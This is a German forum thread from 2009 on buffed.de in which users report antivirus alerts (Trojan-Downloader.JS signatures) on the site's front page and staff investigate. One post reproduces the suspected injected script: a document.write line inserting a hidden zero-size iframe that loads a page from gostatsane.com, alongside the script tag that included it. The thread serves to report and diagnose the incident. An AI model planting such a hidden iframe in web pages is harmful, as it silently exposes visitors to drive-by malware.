# Trojaner per wow.buffed.de



## wongmahjong (1. September 2009)

Hallo,

ich wollte nur kurz die Verantwortlichen der Seite darauf aufmerksam machen, dass Sophos eine Virus-/Spyware-Warnung bei betreten von wow.buffed.de ausgibt.

http://www.sophos.com/security/analyses/vi...sdwnldrhua.html

Wenn jemand vom buffed-Team die Cache-Datei von Opera, die als infiziert gemeldet wird, braucht kann er mich per Mail anschreiben. Das ganze ist ein Javascript, dass versucht die Eingabeaufforderung von Windows zu öffnen und dort irgendein Programm zu laden.

Viele Grüße


----------



## kaepteniglo (1. September 2009)

screenshot der seite, zu dem zeitpunkt der meldung, wäre gut gewesen


----------



## DruffDruff (2. September 2009)

http://www.viruslist.com/de/search?VN=Troj...amp;referer=kis

Hat mein Kaspersky auf der Mainseite um 5:02:29 2x nacheinander geblockt. Zugriff über folgende Links


```
httX://www.gostatsane.coX/

Objekte:

i4.htm und 10.htm
```


----------



## ZAM (2. September 2009)

Die Virusmeldung ist nicht nachvollziehbar. Wir haben McAffee und Kaspersky als kommerzielle Versionen im Einsatz und es gab keine Meldungen dieser Art... mh.


----------



## Grushdak (2. September 2009)

Ich habe ebenso Kapersky drauf - und es kam bisher keine Meldung.


----------



## DruffDruff (3. September 2009)

03.09.2009 04:48:37	http://www.gostatsane.com/10.htm	Firefox	Gefunden: Trojan-Downloader.JS.Iframe.bqq		


03.09.2009 04:48:37	http://www.gostatsane.com/i4.htm	Firefox	Gefunden: Trojan-Downloader.JS.Iframe.bqq		

Direkt zu finden, wenn ich auf www.buffed.de gehe und nur dort.


----------



## Shadowclaw (3. September 2009)

Ich habe, als ich die Portalseite von Buffed aufgerufen habe, von meinem Kaspersky die selbe Meldung wie DruffDruff bekommen.


03.09.2009 05:29:00	Gefunden	trojanisches Programm Trojan-Downloader.JS.Iframe.bqq	httx://www.gostatsane.coX/i4.htm		

03.09.2009 05:29:01	Gefunden	trojanisches Programm Trojan-Downloader.JS.Iframe.bqq	httx://www.gostatsane.coX/10.htm


----------



## Demitrie (3. September 2009)

Als ich ebend schauen wolte was es bei buffed so neues giebt popte plötzlich mein AV auf und meldete mir ein spy programm ...

Hatte das sonst noch wer ausser mir ?  Ich hatte zu dem zeitpunkt nur die buffed seite auf .


----------



## Deis (3. September 2009)

Noe, das so in der Form nicht.
Wenn AV mal bei mir anspringt dann meist erst wenn ich Firefox schließe.


----------



## myadictivo (3. September 2009)

vll wars auch der duden reminder 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## Bjizzel (3. September 2009)

Also bei mir hat Kaspersky auch grad wiedermal Trojaner Alarm geschlagen - kommt recht häufig durch die ganze Fremdwerbung vor die so verlinkt wird auf der buffed Startseite...


----------



## Yoshitomo (3. September 2009)

Moinmoin,

mein AVG meckert seit ein paar Tagen auch immer wieder. Wird schon was dran sein wenn die verschiedensten Scanner Alarm schlagen.



Grüßle


----------



## Enyalios (3. September 2009)

Demitrie schrieb:


> Als ich ebend schauen wolte was es bei buffed so neues giebt popte plötzlich mein AV auf und meldete mir ein spy programm ...
> 
> Hatte das sonst noch wer ausser mir ?  Ich hatte zu dem zeitpunkt nur die buffed seite auf .



Schon mal daran gedacht das ein Virenprogramm auch ml im Hintergrund die Dateien scannt ? Soll heissen auch wenn du die Homepage der Sesamstraße offen hast kann es sein das dein Virenprogramm eben in diesem Moment eine verdächtige Datei findet.

Trojaner auf Buffed.de halte ich irgendwie zu 99,9% für ausgeschlossen.


----------



## PitbullStylez (3. September 2009)

Enyalios schrieb:


> Schon mal daran gedacht das ein Virenprogramm auch ml im Hintergrund die Dateien scannt ? Soll heissen auch wenn du die Homepage der Sesamstraße offen hast kann es sein das dein Virenprogramm eben in diesem Moment eine verdächtige Datei findet.
> 
> Trojaner auf Buffed.de halte ich irgendwie zu 99,9% für ausgeschlossen.



Es gibt weitaus sichere Domains als buffed.de die schon gehackt wurden 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## Haegr@Ysera (3. September 2009)

> * Virenscannern kann man nicht trauen, denn sie kennen nie alle Schädlinge.
> * Virenscannern kann man nicht trauen, denn sie können befallene Systeme nicht sicher säubern.
> ** Virenscannern kann man nicht trauen, denn sie melden manchmal Schädlinge, die gar nicht da sind.*



Von mir eingedickt und unterstrichen. Was natürlich nicht heißt, daß da nix ist. Mit einem vernünftig konfigurierten Browser sollte dennoch nichts passieren.


----------



## Haegr@Ysera (3. September 2009)

sry Doppelpost


----------



## Enyalios (3. September 2009)

PitbullStylez schrieb:


> Es gibt weitaus sichere Domains als buffed.de die schon gehackt wurden
> 
> 
> Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.



Mag sein, aber die Typen würden sich dann wohl kaum für WoW-Accounts interessieren, nicht ?

Seiten der "unwichtigen" Kategorie werden gehackt um sich dort dann zu verewigen. Ich kenne persönlich keinen Fall wo eine Seite wie Buffed.de nur gehackt wird um dort einen KEylogger zu installieren. Ein Webserver hängt genauso an den Sicherheitsmaßnahmen wie der Standard-User-PC, also was Firewall, Virenscan etc. angeht. Eventuell sogar in einer DMZ.


----------



## HaaB (3. September 2009)

Enyalios schrieb:


> Ein Webserver hängt genauso an den Sicherheitsmaßnahmen wie der Standard-User-PC, also was Firewall, Virenscan etc. angeht. Eventuell sogar in einer DMZ.



Lol.... hat die Glocke gehört weiss aber nicht wo der Kloepel hängt. Eine DMZ (Demilitarized Zone) dient mehr oder weniger dazu um das eigene netwerk zu schützen gegen einen gehäckten webserver. Computer in eine DMZ  sitzen AUSERHALB vom hardwarefirewall des routers damit wenn der geháckt wird nicht gleich das ganze interne netzwerk gefärdet is.

Zur meldung... wenn dein virenscanner was meldet dan guck mal in sein log, da steht wo er was gefunden hat.. dan wüsstes Du ob es die buffed seite is oder was anderes.


----------



## Mitzy (3. September 2009)

Enyalios schrieb:


> (…)
> Ich kenne persönlich keinen Fall wo eine Seite wie Buffed.de nur gehackt wird um dort einen KEylogger zu installieren
> (…)



Dann klär ich dich mal kurz auf:
Es wurden curse und alkazham- und, ich glaube, eine dritte Seite- mal gehackt. Augen scheinlich wurde nichts verändert, allerdings, als man näher geschaut hat, wurde die Seite und mehrere Ihrer Downloads so ersetzt, dass man sich unzählige Viren, Trojaner und Keylogger runterlud (ich als Beispiel war einer der glücklichen- allerdings auch schlau genug, die Dinger zu killn).
Vorgekommen ist sowas schon, bei buffed.de direkt weiß ich´s nich, aber ausgeschlossen ist es wirklich nicht.
Was für ein Sinn haben Viren? Nun, dann kann irgendeiner unter der Dusche stehen, grinsen und sich denken „Haha, ich hab´s den Leuten gegeben, ich hab einen Virus programmiert, der nix bringt, außer, dass sie den PC in Reparatur schicken- ich bin so böse, die Gummibären Bande würde sich vor mir fürchten!“


Zum Thema selbst: Man sollte auch nich ausschließen, dass Daten als Virus erkannt werden, obwohl es eigentlich keiner ist. Letztens wurde bei mir die MP3 Datei „Virus.mp3“ als Virus erkannt… Oder „Cry to the black birds“ wurde als Trojaner erkannt- war schon interessant… Böse Musik…!


----------



## Dregalos (3. September 2009)

habe ioch auch seit tagen schon dass mein Kaspersky was meldet.

von www.gostinsane.com oder so, vllt kann buffed da mal gucken welcher werbelink das is


----------



## TheOrc (3. September 2009)

HaaB schrieb:


> Computer in eine DMZ  sitzen AUSERHALB vom hardwarefirewall des routers damit wenn der geháckt wird nicht gleich das ganze interne netzwerk gefärdet is.



Das ist unsinn.

BTT:
McAfee 8.5 Enterprise meldet nichts.


----------



## Dregalos (3. September 2009)

TheOrc schrieb:


> Das ist unsinn.
> 
> BTT:
> McAfee 8.5 Enterprise meldet nichts.



wie gesagt bei mir kaspersky jeden tag beim ersten anmelden auf der seite


----------



## Pente (3. September 2009)

Es wäre hilfreich wenn ihr einen Screenshot der Seite posten könntet in dem Moment wo das Problem auftritt.

Ich hab das Ganze mal in den richtigen Bereich verschoben


----------



## Pente (3. September 2009)

Es wäre nett wenn ihr einen Screenshot der Website machen könntet wenn das auftritt. Vielleicht lässt sich das Problem dann eher eingrenzen oder lokalisieren.


----------



## Dregalos (3. September 2009)

Pente schrieb:


> Es wäre hilfreich wenn ihr einen Screenshot der Seite posten könntet in dem Moment wo das Problem auftritt.
> 
> Ich hab das Ganze mal in den richtigen Bereich verschoben



geht erst morgen wieder wenn ich zum ersten mal auf buffed gehe ^^


----------



## Dregalos (3. September 2009)

gabs schonmal nen post:

http://www.buffed.de/forum/index.php?showtopic=121850


----------



## Dregalos (3. September 2009)

Pente schrieb:


> Es wäre nett wenn ihr einen Screenshot der Website machen könntet wenn das auftritt. Vielleicht lässt sich das Problem dann eher eingrenzen oder lokalisieren.



ich bezweifel dass einer auf die Seite geht ^^

und wenn du damit buffed meinst, die kaspersky mldung kommt bei mir sobald ich auf die buffed startseite gehe, aber nur beim ersten besuch am Tag.


----------



## ZAM (3. September 2009)

Die Meldung sollte jetzt nicht mehr auftauchen - diese merkwürdige Einbindung ist, dank Eurer Hinweise, getilgt.
Die Seite die darin aufgerufen wurde, beinhaltete aber... nichts - es wurde auch nichts im Hintergrund ausgeführt. Echt merkwürdig.


----------



## Dregalos (3. September 2009)

ZAM schrieb:


> Die Meldung sollte jetzt nicht mehr auftauchen - diese merkwürdige Einbindung ist, dank Eurer Hinweise, getilgt.
> Die Seite die darin aufgerufen wurde, beinhaltete aber... nichts - es wurde auch nichts im Hintergrund ausgeführt. Echt merkwürdig.



danke oh großer ZAM  


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 

PS.: Verrätst du uns was es war? ^^


----------



## LordofDemons (4. September 2009)

das ist der bundestrojaner von herrn schäuble :>


----------



## Arsacoon (25. September 2009)

Antivire hat eben Maleware auf buffed.de gefunde


```
HEUR/Exploit.HTML 
in http://www.buffed.de/fileadmin/ja/awst.js
screen folgt
```

Ich empfehle vor der Eingabe von Zugangsdaten für Spiele nach einem buffedbesuch einen FestplattenTest

Sreen folgt


----------



## LordofDemons (25. September 2009)

büdde ins meinungen und anregungen forum verschiebön!


----------



## Arsacoon (25. September 2009)

LordofDemons schrieb:


> büdde ins meinungen und anregungen forum verschiebön!



LoL
empfehle die Definition der beiden Wörter nachzuschlagen


----------



## Maladin (25. September 2009)

Thread verschoben in den Support Bereich - Danke für die Meldung und die Information zur Malware Warnung.

Hier findet die Administration den Thread sicher.

/wink maladin


----------



## ZAM (25. September 2009)

Arsacoon schrieb:


> Ich empfehle vor der Eingabe von Zugangsdaten für Spiele nach einem buffedbesuch einen FestplattenTest



Bei der ganzen Phisher-Welle ist ein natürliches Schutzbedürfnis nachvollziehbar - ABER: Bevor irgendwelche "Empfehlungen" verbreitet werden, empfehle ich Avira mal zu aktualisieren bzw. auf ein Signatur-Update zu warten.

    Der Hinweis auf "awst.js" lies nur den Schluss zu, dass es sich um eine Datei des schon seit über einem Jahr deaktivierten Trackingsystems "AW-Stats" handelt. Jedoch gibt es die vom Virenscanner angesprochene Datei *weder* im Quellcode, *noch *auf unseren Webservern und sie ist auch nicht über dritte Scripte eingebunden. 

Es gibt jedoch eine ähnlich benannte Datei, die zwar noch im HTML-Quellcode der Seite zu sehen aber schon seit über einem Jahr nicht mehr ausführend eingebunden (auskommentiert) und Lichtjahre entfernt von sogenannter Maleware sind. D.h. selbst wenn sie Schadcode enthalten sollte, was nicht der Fall ist, wird sie vom Browser trotzdem ignoriert.


----------



## Arsacoon (25. September 2009)

ZAM schrieb:


> Bei der ganzen Phisher-Welle ist ein natürliches Schutzbedürfnis nachvollziehbar - ABER: Bevor irgendwelche "Empfehlungen" verbreitet werden, empfehle ich Avira mal zu aktualisieren bzw. auf ein Signatur-Update zu warten.
> 
> Der Hinweis auf "awst.js" lies nur den Schluss zu, dass es sich um eine Datei des schon seit über einem Jahr deaktivierten Trackingsystems "AW-Stats" handelt. Jedoch gibt es die vom Virenscanner angesprochene Datei *weder* im Quellcode, *noch *auf unseren Webservern und sie ist auch nicht über dritte Scripte eingebunden.
> 
> Es gibt jedoch eine ähnlich benannte Datei, die zwar noch im HTML-Quellcode der Seite zu sehen aber schon seit über einem Jahr nicht mehr ausführend eingebunden (auskommentiert) und Lichtjahre entfernt von sogenannter Maleware sind. D.h. selbst wenn sie Schadcode enthalten sollte, was nicht der Fall ist, wird sie vom Browser trotzdem ignoriert.




Gleich erst mal zu Beginn:
1. Bin ich Selbst Programmierer für Webanwendungen (also einer der mit dem Code arbeitet und kein dieser MöchtegernCMS-User) 
und kenn mich bestens aus was möglich ist und wann Grund zur Sorge besteht.
2. Wir setzen die kostenpflichtige Variante ein die auch Täglich aktualisiert wird.
Gestern gab es noch keine "Warnung"
Habe ich also rückwärts geupdatet?
3. Habe ich vollstes Verständnis für Fehler z.B. Programmleichen die plötzlich zum Problem werden.
Wofür ich absolut kein Verständnis habe ist wenn Besucher egal ob Laien oder Profis dumm gemacht werden a-lá:
Virensoftware aktualisieren oder darauf wart ob die Warnung morgen immer noch da ist. 

Ihr wisst selbst wie viel Besucher ihr in nur 1 Stunde habt.

Die Empfehlung zu Wartet ob eine Sicherheitswarnung in 1 oder 24 Stunden immer noch eine Sicherheitswarnung ist bissel .....
Dann kann ich auch gleich auf Sicherheit verzichten.

So nun werde ich mal in mich gehen und nach Verständnis für gestresste Forendirektoren und Forenadmins suchen.


----------



## kaepteniglo (25. September 2009)

Bei Signatur-Updates könne immer mal wieder Fehler auftreten.
Plötzlich sind Dateien, die seid Jahren Fehlerfrei sind, angeblich voll mit Viren.

Komisch ist nur, dass anscheinend "nur" AntiVir diese Meldung erzeugt und kein anderes Programm irgendetwas sagt.


----------



## Maladin (25. September 2009)

Arsacoon schrieb:


> Wofür ich absolut kein Verständnis habe ist wenn Besucher egal ob Leihen oder Profis dumm gemacht werden aller
> (Virensoftware aktualisieren oder darauf wart ob die Warnung morgen immer noch da ist. )



Als Programmierer solltest gerade du Verständnis haben, für eine solche Empfehlung. So profan es auch klingt, ich stelle immer wieder die Frage nach dem Stecker und ob er eingesteckt ist.

Ich sehe keinen Angriff auf dich und Dumm gemacht wirst du doch auch nicht. Bitte versuche, nicht zu lesen was nicht da ist 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 

/wink maladin


----------



## Carcharoth (25. September 2009)

Antivir ist bekannt dafür, dass es immer wieder sichere Dateien als Virenträger erkennt.
Bevor also Panik geschoben wird: Erstmal ins Forum von Antivir gucken. Da gibts meistens noch andere User die dasselbe Problem haben.

(Bei mir hats z.B. mal die winlogon.exe als Virus erkannt... )


----------



## ZAM (25. September 2009)

Arsacoon schrieb:


> 1. Bin ich Selbst Programmierer für Webanwendungen (also einer der mit dem Code arbeitet und kein dieser MöchtegernCMS-User) und kenn mich bestens aus was möglich ist und wann Grund zur Sorge besteht.



Die Erklärung bzgl. Code-Einbindung und Auskommentieren war/ist unter anderem ein allgemeiner Hinweis für alle weiteren Leser des Themas. Das irgendwer bei irgendeinem Post über irgendwelche Kenntnisse verfügt, ist den Beiträgen ohne entsprechende Hinweise nicht immer zu entnehmen.



> 2. Wir setzen die kostenpflichtige Variante ein die auch Täglich aktualisiert wird. Gestern gab es noch keine "Warnung" Habe ich also rückwärts geupdatet?



Bei entsprechenden IT-Kenntnissen sollte Dir klar sein, dass aktuelle Signaturupdates auch Fehler enthalten können. 



> 3. Habe ich vollstes Verständnis für Fehler z.B. Programmleichen die plötzlich zum Problem werden. Wofür ich absolut kein Verständnis habe ist wenn Besucher egal ob Laien oder Profis dumm gemacht werden a-lá: Virensoftware aktualisieren oder darauf wart ob die Warnung morgen immer noch da ist.



Das war nicht im Ansatz als "Dumme Anmache" gemeint, nur aufklärend. :-) Selbst sie kommerziellen Versionen der Virenscanner sind nicht vor Fehlern geschützt.



> Die Empfehlung zu Wartet ob eine Sicherheitswarnung in 1 oder 24 Stunden immer noch eine Sicherheitswarnung ist bissel .....



... realistisch. Ja.



> Dann kann ich auch gleich auf Sicherheit verzichten.



Ich sehe keinen Hinweis meinerseits, den Virenscanner abzuschalten.


----------



## aturusan (28. September 2009)

ZAM schrieb:


> ...
> Der Hinweis auf "awst.js" lies nur den Schluss zu, dass es sich um eine Datei des schon seit über einem Jahr deaktivierten Trackingsystems "AW-Stats" handelt. Jedoch gibt es die vom Virenscanner angesprochene Datei *weder* im Quellcode, *noch *auf unseren Webservern und sie ist auch nicht über dritte Scripte eingebunden.



Ich denke auch nicht das es was schlimmes ist, nur was hat es dort zu suchen?

*News:*
buffed intern: Cryengine in Aion im Grafikvergleich
PC Games Hardware fühlt dem MMO auf den Technik-Zahn

Hier in der News ist im Html Code der Verweis auf die awst.js eingebaut.


```
... ergleich</span><br>PC Games Hardware fühlt dem MMO auf den Technik-Zahn<script src="/fileadmin/js/awst.js"></script></a></div>...
```

Die awst.js wo sie doch nicht auf dem Server ist, lässt sich aber ohne Probleme downloaden.

*Inhalt der awst.js:*

```
document.write("<iframe src=http://www.gostatsane.com/reg.asp width=0 height=0></iframe>");
```

Diese reg.asp erzeugt dann wieder eine Flaschdatei. Da kann ich jetzt nicht mehr reinschauen was die macht, ist auch nur weiss bei mir.


Mal schauen ob es demnächst ein Update gibt bei Avira das diese Malware nicht mehr anzeigt.


----------



## Arsacoon (28. September 2009)

ZAM schrieb:


> Die Erklärung bzgl. Code-Einbindung und Auskommentieren war/ist unter anderem ein allgemeiner Hinweis für alle weiteren Leser des Themas. Das irgendwer bei irgendeinem Post über irgendwelche Kenntnisse verfügt, ist den Beiträgen ohne entsprechende Hinweise nicht immer zu entnehmen.
> 
> 
> 
> Bei entsprechenden IT-Kenntnissen sollte Dir klar sein, dass aktuelle Signaturupdates auch Fehler enthalten können.



Das ist möglich daher ist der Titel des Post auch eine Frage gekennzeichnet durch .......... ein Fragezeichen.
Signaturupdates hin oder her die sind völlig irrelevant 
Da ist ne Sicherheitssoftware die Alarm schlägt,
für den Enduser am client is es völlig rille wer hier den Fehler macht 
Seine einzige Aufgabe ist solche Meldungen ernst zu nehmen



ZAM schrieb:


> Das war nicht im Ansatz als "Dumme Anmache" gemeint, nur aufklärend. :-) Selbst sie kommerziellen Versionen der Virenscanner sind nicht vor Fehlern geschützt.
> 
> 
> 
> ... realistisch. Ja.



Die Aufforderung zu warten und eine Warnung einer Sicherheitssoftware eine gewisser Zeitspanne zu ignorieren, ist schon ganz schön Dumm.
Jeder der weiß wozu ein Virenscanner da ist, kommt sich bei dieser Aufforderung verarscht vor. (was ich mit "Dumme Anmache" gemeint habe)
Im Falle eines ernsten Problems ist das der Tot von wie vielen Spiel Accounts?





ZAM schrieb:


> Ich sehe keinen Hinweis meinerseits, den Virenscanner abzuschalten.



Wie viel Sinn macht eine Sicherheitssoftware deren Warnungen man aus sitzt?

--------------------------

Mein Vorposter hat sich dem ja schon genau angenommen danke dafür nochmal.

--------------------------

Das Ihr mittlerweile nicht mal mehr WoW Goldwerbung aus Euren Content halten könnt mach die Möglichkeit von Malware auch nicht unwahrscheinlicher.


----------



## ZAM (28. September 2009)

aturusan schrieb:


> Die awst.js wo sie doch nicht auf dem Server ist, lässt sich aber ohne Probleme downloaden.



Vielen Dank für den Detail-Hinweis. 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 Ich kann sie nur zu keinem Zeitpunkt aufrufen. Und selbst wenn sie appended wäre, könnte man sie nicht über den /fileadmin/-Pfad erreichen, weil es sie nicht gibt. o.O

Frage zur besseren Analyse: Filterst du die Werbung auf buffed.de?


----------



## ZAM (28. September 2009)

Arsacoon schrieb:


> Die Aufforderung zu warten und eine Warnung einer Sicherheitssoftware eine gewisser Zeitspanne zu ignorieren, ist schon ganz schön Dumm.



Vielen Dank das es jetzt nach irgendwelche Eigeninterpretationen mit der Ausdrucksweise auf die persönliche Ebene geht. 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        





> Das Ihr mittlerweile nicht mal mehr WoW Goldwerbung aus Euren Content halten könnt mach die Möglichkeit von Malware auch nicht unwahrscheinlicher.



Bitte was?


----------



## Vestina (28. September 2009)

Nun lasst mal die Kirche im Dorf ...

Ich kann durchaus beide Seiten verstehen. Der Webseitenbetreiberkann ja schlecht seine gesamte Community-Software nach Inhalten mit jeder Virendefinition eines jeden Antivirenprogramms checken. Und da die Updates für die Virenerekennung beinahe stündlich kommen, ist das ein Ding der Unmöglichkeit. Der Webseitenbetreiber ist letztlich nicht dafür vetantwortlich, wenn in einer Virendefinitionsdatei ein Virus/Malware aufgeführt ist, der zufällig oder mit Absicht die gleiche Zeichenabfolge hat, wie ein auf der Webseite verwendetes Script.

Als einigermassen versierter Anwender muss ich aber auch wissen, was ich tun muss, wenn ich eine Virenmeldung erhalte. Das ist je nach Antivirussoftware unterschiedlich. Letztlich kann man vier mögliche Reaktionen unterscheiden:

- Virus etc. in die Qurantäne verschieben
- Virus etc. löschen
- Virus zur Überprüfung an den Hersteller der Antivirussoftware senden
- Zugriff auf die Seite mit dem Virus etc. unterbinden

Letztlich muss ich als Anwender hier eine Aktion starten und kann meine Verantwortung dafür nicht an den Webseitenbetreiber abschieben.

Insgesamt fand ich daher die Reaktion von ZAM angemessen.


----------



## Arsacoon (28. September 2009)

ZAM schrieb:


> Vielen Dank das es jetzt nach irgendwelche Eigeninterpretationen mit der Ausdrucksweise auf die persönliche Ebene geht.
> 
> 
> Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.



Ach bin ich nicht der einzigste der nich genau liest?
Ich bewertete eine Vorgehensweise bzw. eine Empfehlung mit dem Wort "Dumm"
Keine Person oder gar einen Empfehlenden.




ZAM schrieb:


> Bitte was?



Im Aion Livestream befindet sich Werbung für Goldseller.
siehe Screen:


----------



## DeeeRoy (28. September 2009)

Arsacoon schrieb:


> Im Aion Livestream befindet sich Werbung für Goldseller.



Ich glaube, daß "Bitte was?" bezieht sich eher auf den 2. Teil von dem Satz...  


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## ZAM (28. September 2009)

Arsacoon schrieb:


> Im Aion Livestream befindet sich Werbung für Goldseller.



Siehe Beitrag in Karius Thread zum Thema.


----------



## aturusan (28. September 2009)

ZAM schrieb:


> Frage zur besseren Analyse: Filterst du die Werbung auf buffed.de?



Adblock Plus ist bei mir aktiv im FF.

Nach dem Update von Avira ist keine Meldung mehr da. Finde auch das Script nicht mehr im Quelltext.
Die Datei lässt sich nun auch nicht mehr Downloaden.

Wo der Hinweis mit dem Werbefilter kam, machte es ein wenig klick.
Der Filter bearbeitet auch den einkommenten Quellcode, was dann am Ende nicht mal euer Fehler ist sondern ein Fehler von Add Blocker.

Bei mir ist die Meldung erstmal weg. Kann euer Seite wieder normal aufrufen.


----------



## Shantalya (28. September 2009)

Hm... ich konnte http://www.buffed.de/fileadmin/ja/awst.js ebenfalls nicht downloaden.
Weder jetzt noch am 25.9.


----------



## thehed (2. Oktober 2009)

ZAM schrieb:


> Die Meldung sollte jetzt nicht mehr auftauchen - diese merkwürdige Einbindung ist, dank Eurer Hinweise, getilgt.
> Die Seite die darin aufgerufen wurde, beinhaltete aber... nichts - es wurde auch nichts im Hintergrund ausgeführt. Echt merkwürdig.



Hab das ganze gerade eben gehabt:
 02.10.2009 07:20:11	Gefunden: Trojan-Downloader.JS.Small.oj	Firefox http://www.gostatsane.com/nYnTd14.htm

Kaspersky internet security 2010

Bin vom offiziellen Wowforum auf die Buffed Frontseite und da war er.


----------



## Schamos (2. Oktober 2009)

Hallo,
ich muss leider auch anmerken das irgendwas mit der Page nicht stimmt.
Seid heute früh bekomme ich auch immer wieder "HEUR/HTML.Malware" Warnungen vom Scanner, die Version vom VirenScanner ist natürlich aktuell und bis auf Buffed.de meldet er keine Seiten.
Auch wenn ich nachvollziehen kann das ihr nichts dafür könnt wenn ein Scanner eure Seite irrtümlich als "verseucht" bezeichnet würde ich dennoch überlegen ob vielleicht das aufräumen des Codes oder das Prüfen der eingehängten Werbung sinnvoll ist. Sonst könnte man doch wirklich auf die Idee kommen das euch eine eventuelle Verseuchung der PC's eurer User egal ist.

SW-Versionen:
*Avira Personal*
- Produktversion: 9.0.0.410
- Suchengine: 8.02.01.27
*Opera Browser*
- Version: 10.00
- Build: 1750
- ID: Opera/9.80 (Windows NT 6.0; U; de) Presto/2.2.15 Version/10.00
*Betriebssystem*
- OS: Vista Home Prof. SP1
- Benutzerkontensteuerung: aktiv


----------



## Wowneuling (2. Oktober 2009)

Kann ich bestätigen. Und wiedermal direkt am Anfang eines Monats. Zufall?


----------



## LordofDemons (2. Oktober 2009)

also mein antivir erkennt da nix Oo und norton auch nicht also kasperski is schon komisch

(bitte jetzt kein streit welches antivirenprogramm das sicherste ist)


----------



## skyline930 (2. Oktober 2009)

thehed schrieb:


> 02.10.2009 07:20:11	Gefunden: Trojan-Downloader.JS.Small.oj	Firefox http://www.gostatsane.com/nYnTd14.htm



"JS.Small" ist eine Bezeichunung für einen Downloader, der Lücken in eurem System ausnutzt. Wie du siehst, ist die Seite nicht von Buffed, sondern eine Seite von ner Werbung oder so.. Wenn du dein FireFox oder was auch immer, und dein Windows brav updatest, kann das Ding ganz genau .. nichts (!) machen. Wenn du das nicht tust, dann selber schuld.



Schamos schrieb:


> Hallo,
> ich muss leider auch anmerken das irgendwas mit der Page nicht stimmt.
> Seid heute früh bekomme ich auch immer wieder "HEUR/HTML.Malware" Warnungen vom Scanner, die Version vom VirenScanner ist natürlich aktuell und bis auf Buffed.de meldet er keine Seiten.
> Auch wenn ich nachvollziehen kann das ihr nichts dafür könnt wenn ein Scanner eure Seite irrtümlich als "verseucht" bezeichnet würde ich dennoch überlegen ob vielleicht das aufräumen des Codes oder das Prüfen der eingehängten Werbung sinnvoll ist. Sonst könnte man doch wirklich auf die Idee kommen das euch eine eventuelle Verseuchung der PC's eurer User egal ist.



Kannst du lesen? "HEUR/HTML.Malware" ~ "Heuristical Report/HTML Malware" = "Heuristische Meldung" ! Wenn zb. ein Stück der Werbung ein Popup aufmacht, in dem ein String, oder eine Variable als "variable57" definiert ist, und im Virus "PöseMalware" dieselbe Variable vorkommt, aber ansonsten nichts verdächtig ist, dann heißt das "HEUR/HTML.Malware". Also ein heuristischer Report, also zu 99,99999% ein Fehlalarm. (Btw, die Heuristik von Avira is eh scheiße, eben wegen diesem von mir genannten Beispiel, weswegen die von mir auch abgewürgt wurde.)

Das liegt also NICHT am unaufgeräumten Code. Prüfen der eingehängten Werbung geht nicht, da diese von einer externen Firma bereitgestellt wird. (Nehme ich mal stark an.)

Von daher beruhigt euch Kinder, und informiert euch ein bisschen.
Ich glaube ich sollte mal sowas wie einen Aufklärungsthread machen. Nicht den mit Bienchen und Blümchen, sondern mit Systemsicherheit 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        



EDIT: Schamos, habe GENAU die selbe Version von Avira, nur mit FireFox + AdBlockPlus. Also liegt es nicht an buffed, sondern an dir. Bei mir kommt nämlich nichts.

EDIT2: ZAM, es liegt an der Seite gostatsane. c o m, ist nicht aufrufbar (Directory Listing Denied This Virtual Directory does not allow contents to be listed.), versucht einen uralten IFrame, der per Javascript Schadcode auf dem Rechner ausführen kann. Glaube vor ca. nem Jahr kam ein Hotfix für Windows raus - also wer sich da infiziert, hat es VÖLLIG sich zuzuschreiben, da ihr ja nicht für die Werbung verantwortlich seid.


----------



## ZAM (2. Oktober 2009)

skyline930 schrieb:


> EDIT2: ZAM, es liegt an der Seite gostatsane. c o m, ist nicht aufrufbar (Directory Listing Denied This Virtual Directory does not allow contents to be listed.), versucht einen uralten IFrame, der per Javascript Schadcode auf dem Rechner ausführen kann. Glaube vor ca. nem Jahr kam ein Hotfix für Windows raus - also wer sich da infiziert, hat es VÖLLIG sich zuzuschreiben, da ihr ja nicht für die Werbung verantwortlich seid.



Jaein - wir haben zwar keinen Einfluss auf die Werbeschaltung direkt, aber sollte irgendwas negatives dahinter stecken, ist es auch unser Problem - Wir analysieren die Meldungen und senden alle möglichen Infos an unseren Anbieter weiter. Wenn der Code durch einen der Banner in der Rotation in die Seite eingebunden werden sollte, muss der Banner auf jeden Fall raus, egal was drauf gezeigt wird. Aber unsere Scanner haben bisher nichts gemeldet und auch die in den Virus-Infos geführten Dateien, die angeblich durch den erwähnten Schadcode heruntergeladen werden sollen, sind nicht zu finden. Aber wie gesagt, zur Sicherheit sind alle bisherigen Infos an den Anbieter unserer Werbeschaltungen weitergegeben. 

Wie schon geschrieben, die angeblich damit zusammenhängenden Dateien auf unserem Server sind nicht auszumachen und die Scripte, die auf den gemeldeten Seiten eingebunden sind, sind secure. Ich sehe keine Gefährdung.


----------



## skyline930 (2. Oktober 2009)

ZAM schrieb:


> Jaein - wir haben zwar keinen Einfluss auf die Werbeschaltung direkt, aber sollte irgendwas negatives dahinter stecken, ist es auch unser Problem



Ja, war auch gemeint, bisschen doof von mir ausgedrückt 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 



ZAM schrieb:


> Wie schon geschrieben, die angeblich damit zusammenhängenden Dateien auf unserem Server sind nicht auszumachen und die Scripte, die auf den gemeldeten Seiten eingebunden sind, sind secure. Ich sehe keine Gefährdung.



Trotzdem würde ich versuchen nichts mit der Seite gostatsane . c o m zu tun zu haben.


----------



## ZAM (2. Oktober 2009)

skyline930 schrieb:


> Trotzdem würde ich versuchen nichts mit der Seite gostatsane . c o m zu tun zu haben.



